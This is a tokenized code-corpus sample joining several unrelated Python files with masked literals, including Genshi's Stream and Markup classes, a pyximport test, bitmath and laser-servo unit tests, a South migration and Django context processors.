"""<STR_LIT>""" <EOL> self . events = events <EOL> self . serializer = serializer <EOL> def __iter__ ( self ) : <EOL> return iter ( self . events ) <EOL> def __or__ ( self , function ) : <EOL> """<STR_LIT>""" <EOL> return Stream ( _ensure ( function ( self ) ) , serializer = self . serializer ) <EOL> def filter ( self , * filters ) : <EOL> """<STR_LIT>""" <EOL> return reduce ( operator . or_ , ( self , ) + filters ) <EOL> def render ( self , method = None , encoding = '<STR_LIT:utf-8>' , out = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> from genshi . output import encode <EOL> if method is None : <EOL> method = self . serializer or '<STR_LIT>' <EOL> generator = self . serialize ( method = method , ** kwargs ) <EOL> return encode ( generator , method = method , encoding = encoding , out = out ) <EOL> def select ( self , path , namespaces = None , variables = None ) : <EOL> """<STR_LIT>""" <EOL> from genshi . path import Path <EOL> return Path ( path ) . select ( self , namespaces , variables ) <EOL> def serialize ( self , method = '<STR_LIT>' , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> from genshi . output import get_serializer <EOL> if method is None : <EOL> method = self . serializer or '<STR_LIT>' <EOL> return get_serializer ( method , ** kwargs ) ( _ensure ( self ) ) <EOL> def __str__ ( self ) : <EOL> return self . render ( ) <EOL> def __unicode__ ( self ) : <EOL> return self . render ( encoding = None ) <EOL> def __html__ ( self ) : <EOL> return self <EOL> START = Stream . START <EOL> END = Stream . END <EOL> TEXT = Stream . TEXT <EOL> XML_DECL = Stream . XML_DECL <EOL> DOCTYPE = Stream . DOCTYPE <EOL> START_NS = Stream . START_NS <EOL> END_NS = Stream . END_NS <EOL> START_CDATA = Stream . START_CDATA <EOL> END_CDATA = Stream . END_CDATA <EOL> PI = Stream . PI <EOL> COMMENT = Stream . COMMENT <EOL> def _ensure ( stream ) : <EOL> """<STR_LIT>""" <EOL> stream = iter ( stream ) <EOL> event = stream . next ( ) <EOL> if type ( event ) is not tuple or len ( event ) != <NUM_LIT:3> : <EOL> for event in chain ( [ event ] , stream ) : <EOL> if hasattr ( event , '<STR_LIT>' ) : <EOL> event = event . totuple ( ) <EOL> else : <EOL> event = TEXT , unicode ( event ) , ( None , - <NUM_LIT:1> , - <NUM_LIT:1> ) <EOL> yield event <EOL> return <EOL> yield event <EOL> for event in stream : <EOL> yield event <EOL> class Attrs ( tuple ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = [ ] <EOL> def __contains__ ( self , name ) : <EOL> """<STR_LIT>""" <EOL> for attr , _ in self : <EOL> if attr == name : <EOL> return True <EOL> def __getslice__ ( self , i , j ) : <EOL> """<STR_LIT>""" <EOL> return Attrs ( tuple . __getslice__ ( self , i , j ) ) <EOL> def __or__ ( self , attrs ) : <EOL> """<STR_LIT>""" <EOL> repl = dict ( [ ( an , av ) for an , av in attrs if an in self ] ) <EOL> return Attrs ( [ ( sn , repl . get ( sn , sv ) ) for sn , sv in self ] + <EOL> [ ( an , av ) for an , av in attrs if an not in self ] ) <EOL> def __repr__ ( self ) : <EOL> if not self : <EOL> return '<STR_LIT>' <EOL> return '<STR_LIT>' % '<STR_LIT:U+002CU+0020>' . join ( [ repr ( item ) for item in self ] ) <EOL> def __sub__ ( self , names ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( names , basestring ) : <EOL> names = ( names , ) <EOL> return Attrs ( [ ( name , val ) for name , val in self if name not in names ] ) <EOL> def get ( self , name , default = None ) : <EOL> """<STR_LIT>""" <EOL> for attr , value in self : <EOL> if attr == name : <EOL> return value <EOL> return default <EOL> def totuple ( self ) : <EOL> """<STR_LIT>""" <EOL> return TEXT , u'<STR_LIT>' . join ( [ x [ <NUM_LIT:1> ] for x in self ] ) , ( None , - <NUM_LIT:1> , - <NUM_LIT:1> ) <EOL> class Markup ( unicode ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = [ ] <EOL> def __add__ ( self , other ) : <EOL> return Markup ( unicode ( self ) + unicode ( escape ( other ) ) ) <EOL> def __radd__ ( self , other ) : <EOL> return Markup ( unicode ( escape ( other ) ) + unicode ( self ) ) <EOL> def __mod__ ( self , args ) : <EOL> if isinstance ( args , dict ) : <EOL> args = dict ( zip ( args . keys ( ) , map ( escape , args . values ( ) ) ) ) <EOL> elif isinstance ( args , ( list , tuple ) ) : <EOL> args = tuple ( map ( escape , args ) ) <EOL> else : <EOL> args = escape ( args ) <EOL> return Markup ( unicode . __mod__ ( self , args ) ) <EOL> def __mul__ ( self , num ) : <EOL> return Markup ( unicode ( self ) * num ) <EOL> def __rmul__ ( self , num ) : <EOL> return Markup ( num * unicode ( self ) ) <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , unicode ( self ) ) <EOL> def join ( self , seq , escape_quotes = True ) : <EOL> """<STR_LIT>""" <EOL> return Markup ( unicode ( self ) . join ( [ escape ( item , quotes = escape_quotes ) <EOL> for item in seq ] ) ) <EOL> def escape ( cls , text , quotes = True ) : <EOL> """<STR_LIT>""" <EOL> if not text : <EOL> return cls ( ) <EOL> if type ( text ) is cls : <EOL> return text <EOL> if hasattr ( text , '<STR_LIT>' ) : <EOL> return Markup ( text . __html__ ( ) ) <EOL> text = unicode ( text ) . replace ( '<STR_LIT:&>' , '<STR_LIT>' ) . replace ( '<STR_LIT:<>' , '<STR_LIT>' ) . replace ( '<STR_LIT:>>' , '<STR_LIT>' ) <EOL> if quotes : <EOL> text = text . replace ( '<STR_LIT:">' , '<STR_LIT>' ) <EOL> return cls ( text ) <EOL> escape = classmethod ( escape ) <EOL> def unescape ( self ) : <EOL> """<STR_LIT>""" <EOL> if not self : <EOL> return u'<STR_LIT>' <EOL> return unicode ( self ) . replace ( '<STR_LIT>' , '<STR_LIT:">' ) . replace ( '<STR_LIT>' , '<STR_LIT:>>' ) . replace ( '<STR_LIT>' , '<STR_LIT:<>' ) . replace ( '<STR_LIT>' , '<STR_LIT:&>' ) <EOL> def stripentities ( self , keepxmlentities = False ) : <EOL> """<STR_LIT>""" <EOL> return Markup ( stripentities ( self , keepxmlentities = keepxmlentities ) ) <EOL> def striptags ( self ) : <EOL> """<STR_LIT>""" <EOL> return Markup ( striptags ( self ) ) <EOL> try : <EOL> from genshi . _speedups import Markup <EOL> except ImportError : <EOL> pass <EOL> escape = Markup . escape <EOL> def unescape ( text ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( text , Markup ) : <EOL> return text <EOL> return text . unescape ( ) <EOL> class Namespace ( object ) : <EOL> """<STR_LIT>""" <EOL> def __new__ ( cls , uri ) : <EOL> if type ( uri ) is cls : <EOL> return uri <EOL> return object . __new__ ( cls ) <EOL> def __getnewargs__ ( self ) : <EOL> return ( self . uri , ) <EOL> def __getstate__ ( self ) : <EOL> return self . uri <EOL> def __setstate__ ( self , uri ) : <EOL> self . uri = uri <EOL> def __init__ ( self , uri ) : <EOL> self . uri = unicode ( uri ) <EOL> def __contains__ ( self , qname ) : <EOL> return qname . namespace == self . uri <EOL> def __ne__ ( self , other ) : <EOL> return not self == other <EOL> def __eq__ ( self , other ) : <EOL> if isinstance ( other , Namespace ) : <EOL> return self . uri == other . uri <EOL> return self . uri == other <EOL> def __getitem__ ( self , name ) : <EOL> return QName ( self . uri + u'<STR_LIT:}>' + name ) <EOL> __getattr__ = __getitem__ <EOL> def __hash__ ( self ) : <EOL> return hash ( self . uri ) <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % self . uri <EOL> def __str__ ( self ) : <EOL> return self . uri . encode ( '<STR_LIT:utf-8>' ) <EOL> def __unicode__ ( self ) : <EOL> return self . uri <EOL> XML_NAMESPACE = Namespace ( '<STR_LIT>' ) <EOL> class QName ( unicode ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> def __new__ ( cls , qname ) : <EOL> """<STR_LIT>""" <EOL> if type ( qname ) is cls : <EOL> return qname <EOL> parts = qname . lstrip ( u'<STR_LIT:{>' ) . split ( u'<STR_LIT:}>' , <NUM_LIT:1> ) <EOL> if len ( parts ) > <NUM_LIT:1> : <EOL> self = unicode . __new__ ( cls , u'<STR_LIT>' % qname ) <EOL> self . namespace , self . localname = map ( unicode , parts ) <EOL> else : <EOL> self = unicode . __new__ ( cls , qname ) <EOL> self . namespace , self . localname = None , unicode ( qname ) <EOL> return self <EOL> def __getnewargs__ ( self ) : <EOL> return ( self . lstrip ( '<STR_LIT:{>' ) , ) <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % unicode . __repr__ ( self . lstrip ( '<STR_LIT:{>' ) ) </s>
<s> import pyximport ; pyximport . install ( ) <EOL> import os , sys <EOL> import time , shutil <EOL> import tempfile <EOL> def make_tempdir ( ) : <EOL> tempdir = os . path . join ( tempfile . gettempdir ( ) , "<STR_LIT>" ) <EOL> if os . path . exists ( tempdir ) : <EOL> remove_tempdir ( tempdir ) <EOL> os . mkdir ( tempdir ) <EOL> return tempdir <EOL> def remove_tempdir ( tempdir ) : <EOL> shutil . rmtree ( tempdir , <NUM_LIT:0> , on_remove_file_error ) <EOL> def on_remove_file_error ( func , path , excinfo ) : <EOL> print "<STR_LIT>" , path <EOL> print "<STR_LIT>" <EOL> print func , excinfo <EOL> print "<STR_LIT>" <EOL> def test ( ) : <EOL> tempdir = make_tempdir ( ) <EOL> sys . path . append ( tempdir ) <EOL> filename = os . path . join ( tempdir , "<STR_LIT>" ) <EOL> open ( filename , "<STR_LIT:w>" ) . write ( "<STR_LIT>" ) <EOL> import dummy <EOL> reload ( dummy ) <EOL> depend_filename = os . path . join ( tempdir , "<STR_LIT>" ) <EOL> depend_file = open ( depend_filename , "<STR_LIT:w>" ) <EOL> depend_file . write ( "<STR_LIT>" ) <EOL> depend_file . close ( ) <EOL> build_filename = os . path . join ( tempdir , "<STR_LIT>" ) <EOL> build_file = open ( build_filename , "<STR_LIT:w>" ) <EOL> build_file . write ( """<STR_LIT>""" ) <EOL> build_file . close ( ) <EOL> open ( os . path . join ( tempdir , "<STR_LIT>" ) , "<STR_LIT:w>" ) . write ( "<STR_LIT:U+0020>" ) <EOL> open ( os . path . join ( tempdir , "<STR_LIT>" ) , "<STR_LIT:w>" ) . write ( "<STR_LIT:U+0020>" ) <EOL> open ( os . path . join ( tempdir , "<STR_LIT>" ) , "<STR_LIT:w>" ) . write ( "<STR_LIT:U+0020>" ) <EOL> reload ( dummy ) <EOL> assert len ( pyximport . _test_files ) == <NUM_LIT:1> , pyximport . _test_files <EOL> reload ( dummy ) <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> open ( os . path . join ( tempdir , "<STR_LIT>" ) , "<STR_LIT:w>" ) . write ( "<STR_LIT:U+0020>" ) <EOL> print "<STR_LIT>" <EOL> reload ( dummy ) <EOL> assert len ( pyximport . _test_files ) == <NUM_LIT:1> , pyximport . _test_files <EOL> reload ( dummy ) <EOL> assert len ( pyximport . _test_files ) == <NUM_LIT:0> , pyximport . _test_files <EOL> remove_tempdir ( tempdir ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> test ( ) </s>
<s> from stream_framework . aggregators . base import RecentVerbAggregator <EOL> from stream_framework . feeds . redis import RedisFeed <EOL> from stream_framework . feeds . aggregated_feed . redis import RedisAggregatedFeed <EOL> class PinFeed ( RedisFeed ) : <EOL> key_format = '<STR_LIT>' <EOL> class AggregatedPinFeed ( RedisAggregatedFeed ) : <EOL> aggregator_class = RecentVerbAggregator <EOL> key_format = '<STR_LIT>' <EOL> class UserPinFeed ( PinFeed ) : <EOL> key_format = '<STR_LIT>' </s>
<s> """<STR_LIT>""" <EOL> from . import TestCase <EOL> import bitmath <EOL> class TestInit ( TestCase ) : <EOL> def test___init__invalid_input_types ( self ) : <EOL> """<STR_LIT>""" <EOL> invalid_inputs = [ "<STR_LIT>" , <NUM_LIT:100> + <NUM_LIT> , None ] <EOL> for invalid_input in invalid_inputs : <EOL> with self . assertRaises ( ValueError ) : <EOL> bitmath . best_prefix ( invalid_input ) <EOL> def test___init_multiple_kwargs ( self ) : <EOL> """<STR_LIT>""" <EOL> multi_kwargs = { <EOL> "<STR_LIT:value>" : <NUM_LIT:100> , <EOL> "<STR_LIT>" : <NUM_LIT:100> , <EOL> "<STR_LIT>" : <NUM_LIT> <EOL> } <EOL> with self . assertRaises ( ValueError ) : <EOL> bitmath . Byte ( ** multi_kwargs ) <EOL> def test___init__valid_inputs ( self ) : <EOL> """<STR_LIT>""" <EOL> inputs = [ <EOL> ( ( <NUM_LIT:100> , ) , dict ( ) ) , <EOL> ( tuple ( ) , { "<STR_LIT:value>" : <NUM_LIT:100> } ) , <EOL> ( tuple ( ) , { "<STR_LIT>" : <NUM_LIT:100> } ) , <EOL> ( tuple ( ) , { "<STR_LIT>" : <NUM_LIT> } ) <EOL> ] <EOL> for args , kwargs in inputs : <EOL> self . assertEqual ( bitmath . Byte ( * args , ** kwargs ) , bitmath . Byte ( <NUM_LIT:100> ) ) </s>
<s> import unittest <EOL> from model import LaserModel <EOL> class LaserModelTests ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . servos = TestServos ( ) <EOL> self . model = LaserModel ( self . servos , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> def test_setxaxis_getxaxis ( self ) : <EOL> self . model . setXAxis ( <NUM_LIT:200> ) <EOL> self . assertEqual ( self . model . getXAxis ( ) , <NUM_LIT:200> ) <EOL> self . assertEqual ( self . servos . xaxis , <NUM_LIT:200> ) <EOL> def test_setyaxis_getyaxis ( self ) : <EOL> self . model . setYAxis ( <NUM_LIT:200> ) <EOL> self . assertEqual ( self . model . getYAxis ( ) , <NUM_LIT:200> ) <EOL> self . assertEqual ( self . servos . yaxis , <NUM_LIT:200> ) <EOL> def test_setxaxis_out_of_bounds_raises_valueerror ( self ) : <EOL> self . assertRaises ( ValueError , self . model . setXAxis , <NUM_LIT:10> ) <EOL> self . assertRaises ( ValueError , self . model . setXAxis , <NUM_LIT> ) <EOL> def test_setyaxis_out_of_bounds_raises_valueerror ( self ) : <EOL> self . assertRaises ( ValueError , self . model . setYAxis , <NUM_LIT:10> ) <EOL> self . assertRaises ( ValueError , self . model . setYAxis , <NUM_LIT> ) <EOL> def test_axis_defaults_to_400 ( self ) : <EOL> self . assertEqual ( self . model . getXAxis ( ) , <NUM_LIT> ) <EOL> self . assertEqual ( self . model . getYAxis ( ) , <NUM_LIT> ) <EOL> self . assertEqual ( self . servos . xaxis , <NUM_LIT> ) <EOL> self . assertEqual ( self . servos . yaxis , <NUM_LIT> ) <EOL> def test_setcalibration_getcalibration ( self ) : <EOL> targetCal = [ { '<STR_LIT:x>' : <NUM_LIT> , '<STR_LIT:y>' : <NUM_LIT> } , { '<STR_LIT:x>' : <NUM_LIT> , '<STR_LIT:y>' : <NUM_LIT> } , { '<STR_LIT:x>' : <NUM_LIT> , '<STR_LIT:y>' : <NUM_LIT> } , { '<STR_LIT:x>' : <NUM_LIT:200> , '<STR_LIT:y>' : <NUM_LIT> } ] <EOL> servoCal = [ { '<STR_LIT:x>' : <NUM_LIT:10> , '<STR_LIT:y>' : <NUM_LIT:10> } , { '<STR_LIT:x>' : <NUM_LIT:50> , '<STR_LIT:y>' : <NUM_LIT:10> } , { '<STR_LIT:x>' : <NUM_LIT:50> , '<STR_LIT:y>' : <NUM_LIT:50> } , { '<STR_LIT:x>' : <NUM_LIT:10> , '<STR_LIT:y>' : <NUM_LIT:50> } ] <EOL> self . model . setCalibration ( targetCal , servoCal ) <EOL> tc , sc = self . model . getCalibration ( ) <EOL> self . assertEqual ( tc , targetCal ) <EOL> self . assertEqual ( sc , servoCal ) <EOL> def test_setcalibration_saves_calibration ( self ) : <EOL> targetCal = [ { '<STR_LIT:x>' : <NUM_LIT> , '<STR_LIT:y>' : <NUM_LIT> } , { '<STR_LIT:x>' : <NUM_LIT> , '<STR_LIT:y>' : <NUM_LIT> } , { '<STR_LIT:x>' : <NUM_LIT> , '<STR_LIT:y>' : <NUM_LIT> } , { '<STR_LIT:x>' : <NUM_LIT:200> , '<STR_LIT:y>' : <NUM_LIT> } ] <EOL> servoCal = [ { '<STR_LIT:x>' : <NUM_LIT:10> , '<STR_LIT:y>' : <NUM_LIT:10> } , { '<STR_LIT:x>' : <NUM_LIT:50> , '<STR_LIT:y>' : <NUM_LIT:10> } , { '<STR_LIT:x>' : <NUM_LIT:50> , '<STR_LIT:y>' : <NUM_LIT:50> } , { '<STR_LIT:x>' : <NUM_LIT:10> , '<STR_LIT:y>' : <NUM_LIT:50> } ] <EOL> self . model . setCalibration ( targetCal , servoCal ) <EOL> self . model = LaserModel ( self . servos , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> tc , sc = self . model . getCalibration ( ) <EOL> self . assertEqual ( tc , targetCal ) <EOL> self . assertEqual ( sc , servoCal ) <EOL> def test_target ( self ) : <EOL> targetCal = [ { '<STR_LIT:x>' : <NUM_LIT> , '<STR_LIT:y>' : <NUM_LIT> } , { '<STR_LIT:x>' : <NUM_LIT> , '<STR_LIT:y>' : <NUM_LIT> } , { '<STR_LIT:x>' : <NUM_LIT> , '<STR_LIT:y>' : <NUM_LIT> } , { '<STR_LIT:x>' : <NUM_LIT> , '<STR_LIT:y>' : <NUM_LIT> } ] <EOL> servoCal = [ { '<STR_LIT:x>' : <NUM_LIT> , '<STR_LIT:y>' : <NUM_LIT> } , { '<STR_LIT:x>' : <NUM_LIT> , '<STR_LIT:y>' : <NUM_LIT> } , { '<STR_LIT:x>' : <NUM_LIT> , '<STR_LIT:y>' : <NUM_LIT> } , { '<STR_LIT:x>' : <NUM_LIT> , '<STR_LIT:y>' : <NUM_LIT> } ] <EOL> self . model . setCalibration ( targetCal , servoCal ) <EOL> self . model . target ( <NUM_LIT> , <NUM_LIT> ) <EOL> self . assertEqual ( self . servos . xaxis , <NUM_LIT> ) <EOL> self . assertEqual ( self . servos . yaxis , <NUM_LIT> ) <EOL> class TestServos ( object ) : <EOL> def __init__ ( self ) : <EOL> self . xaxis = <NUM_LIT:0> <EOL> self . yaxis = <NUM_LIT:0> <EOL> def setXAxis ( self , value ) : <EOL> self . xaxis = value <EOL> def setYAxis ( self , value ) : <EOL> self . yaxis = value <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> import json <EOL> from api . view import ApiView <EOL> from popong_models . statement import Statement <EOL> class StatementApi ( ApiView ) : <EOL> model = Statement <EOL> kind_single = '<STR_LIT>' <EOL> kind_list = '<STR_LIT>' <EOL> def _search ( self ) : <EOL> return super ( StatementApi , self ) . _search ( fieldname = '<STR_LIT:content>' ) <EOL> def to_dict ( self , statement ) : <EOL> d = { <EOL> '<STR_LIT:id>' : statement . id , <EOL> '<STR_LIT>' : statement . meeting_id , <EOL> '<STR_LIT>' : statement . person_id , <EOL> '<STR_LIT>' : statement . sequence , <EOL> '<STR_LIT>' : statement . speaker , <EOL> '<STR_LIT:content>' : statement . content , <EOL> '<STR_LIT:date>' : statement . date , <EOL> '<STR_LIT:url>' : '<STR_LIT>' % ( statement . meeting_id , statement . id ) <EOL> } <EOL> return d </s>
<s> from setuptools import setup <EOL> import os <EOL> def read ( filename ) : <EOL> return open ( filename ) . read ( ) <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> long_description = read ( '<STR_LIT>' ) , <EOL> url = '<STR_LIT>' , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> keywords = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:ascii>' , '<STR_LIT>' , '<STR_LIT:text>' ] , <EOL> py_modules = [ '<STR_LIT>' ] , <EOL> scripts = [ os . path . join ( '<STR_LIT>' , '<STR_LIT>' ) ] , <EOL> ) </s>
<s> import datetime <EOL> from south . db import db <EOL> from south . v2 import SchemaMigration <EOL> from django . db import models <EOL> class Migration ( SchemaMigration ) : <EOL> def forwards ( self , orm ) : <EOL> db . create_table ( '<STR_LIT>' , ( <EOL> ( '<STR_LIT:id>' , self . gf ( '<STR_LIT>' ) ( primary_key = True ) ) , <EOL> ( '<STR_LIT:title>' , self . gf ( '<STR_LIT>' ) ( max_length = <NUM_LIT> ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( max_length = <NUM_LIT> ) ) , <EOL> ( '<STR_LIT:description>' , self . gf ( '<STR_LIT>' ) ( null = True , blank = True ) ) , <EOL> ( '<STR_LIT:start>' , self . gf ( '<STR_LIT>' ) ( db_index = True ) ) , <EOL> ( '<STR_LIT:end>' , self . gf ( '<STR_LIT>' ) ( db_index = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( max_length = <NUM_LIT> , blank = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( default = True ) ) , <EOL> ( '<STR_LIT:user>' , self . gf ( '<STR_LIT>' ) ( to = orm [ '<STR_LIT>' ] ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( max_length = <NUM_LIT:50> , db_index = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( auto_now_add = True , blank = True ) ) , <EOL> ) ) <EOL> db . send_create_signal ( '<STR_LIT>' , [ '<STR_LIT>' ] ) <EOL> def backwards ( self , orm ) : <EOL> db . delete_table ( '<STR_LIT>' ) <EOL> models = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:email>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:password>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:username>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:end>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:start>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:user>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } <EOL> } <EOL> complete_apps = [ '<STR_LIT>' ] </s>
<s> from django . contrib . sites . models import Site <EOL> from django . contrib . contenttypes . models import ContentType <EOL> from django . shortcuts import render_to_response <EOL> from django . shortcuts import get_object_or_404 <EOL> from django . template import RequestContext <EOL> from django . conf import settings <EOL> def current_site ( request ) : <EOL> return { '<STR_LIT>' : Site . objects . get_current ( ) } <EOL> def current_page ( request ) : <EOL> path = request . path <EOL> is_events = False <EOL> is_blog = False <EOL> is_profile = False <EOL> is_home = False <EOL> if path . startswith ( "<STR_LIT>" ) : <EOL> is_events = True <EOL> elif path . startswith ( "<STR_LIT>" ) : <EOL> is_blog = True <EOL> elif path . startswith ( "<STR_LIT>" ) : <EOL> is_profile = True <EOL> else : <EOL> is_home = True <EOL> return { '<STR_LIT>' : is_home , <EOL> '<STR_LIT>' : is_profile , <EOL> '<STR_LIT>' : is_blog , <EOL> '<STR_LIT>' : is_events } </s>
<s> import requests <EOL> from requests . auth import HTTPBasicAuth <EOL> import urlparse <EOL> import urllib <EOL> BASE_URL = '<STR_LIT>' <EOL> SERIES_ENDPOINT = '<STR_LIT>' <EOL> def make_url_args ( params ) : <EOL> """<STR_LIT>""" <EOL> p = [ ] <EOL> for key , value in params . iteritems ( ) : <EOL> if isinstance ( value , ( list , tuple ) ) : <EOL> for v in value : <EOL> p . append ( ( key , v ) ) <EOL> elif isinstance ( value , dict ) : <EOL> for k , v in value . items ( ) : <EOL> p . append ( ( '<STR_LIT>' % ( key , k ) , v ) ) <EOL> elif isinstance ( value , bool ) : <EOL> p . append ( ( key , str ( value ) . lower ( ) ) ) <EOL> elif value is None : <EOL> continue <EOL> else : <EOL> p . append ( ( key , str ( value ) ) ) <EOL> return urllib . urlencode ( p ) . encode ( "<STR_LIT>" ) <EOL> class HTTPEndpoint ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , database_id , key , secret , base_url = BASE_URL ) : <EOL> if base_url . endswith ( '<STR_LIT:/>' ) : <EOL> self . base_url = base_url <EOL> else : <EOL> self . base_url = base_url + '<STR_LIT:/>' 